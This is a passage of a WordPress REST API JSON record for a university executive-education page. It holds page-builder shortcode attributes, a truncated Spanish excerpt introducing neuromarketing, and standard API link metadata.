background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-tags\u00bb color=\u00bbAccent-Color\u00bb] Introducci\u00f3n El neuromarketing [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":36,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-6506","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/6506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=6506"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/6506\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=6506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}